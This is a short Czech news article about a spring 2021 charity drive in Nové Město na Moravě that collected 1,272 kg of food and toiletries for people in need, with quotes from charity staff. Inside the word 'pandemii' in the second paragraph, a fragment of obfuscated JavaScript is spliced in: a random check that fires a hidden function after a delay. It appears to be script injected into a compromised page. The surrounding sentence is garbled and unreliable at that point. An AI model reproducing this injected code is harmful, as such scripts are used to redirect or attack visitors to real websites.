Rainbow page separator

Lidé darovali potřebným 1272 kilogramů potravin a drogerie

Pátek, 30. Duben 2021

Žďár nad Sázavou, Nové Město na Moravě / Sbírka potravin, které poslouží osobám v nouzi z řad klientů Oblastní charity Žďár nad Sázavou a novoměstského Portima, v novoměstské BILLE vynesla celkem 1272 kilogramů potravin a drogerie. Portimo od dárců ve vymezeném čase získalo 207 kilogramů pomoci, charita 1065.
„Klientům charitní záchranné sítě tak můžeme pomoci se zajištěním základních potřeb a přispět k tomu, aby jejich život byl důstojnější,“ sdělila koordinátorka projektu Jana Kincová Křížková. Zaměstnanci charity zaznamenali v posledním roce navýšení počtu žadatelů o pomoc, a to zejména kvůli pandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andemii COVID-19 a jejím ekonomickým dopadům. „Nárůst klientů pro nás znamená i vyšší nároky na zajištění materiální pomoci, a proto nás těší zájem veřejnosti, která není lhostejná k osudům druhých,“ dodala koordinátorka.
„Příjemným překvapením byl pro nás fakt, že se dárci více zajímali o to, co je skutečně potřeba. Darovali tak zejména potraviny a drogerii, kterých máme dlouhodobě nedostatek, jako jsou konzervy, dětské výživy, trvanlivé mléko a z drogerie dětské pleny, šampony a sprchové gely. I za poměrně krátkou dobu, po kterou se Portimo sbírky účastnilo, se díky štědrosti dárců podařilo doplnit zásoby potravin, které budou rozváženy lidem a rodinám v tíživé situaci,“ uvedla za Portimo vedoucí sociálně aktivizačních služeb pro rodiny s dětmi Petra Holotíková.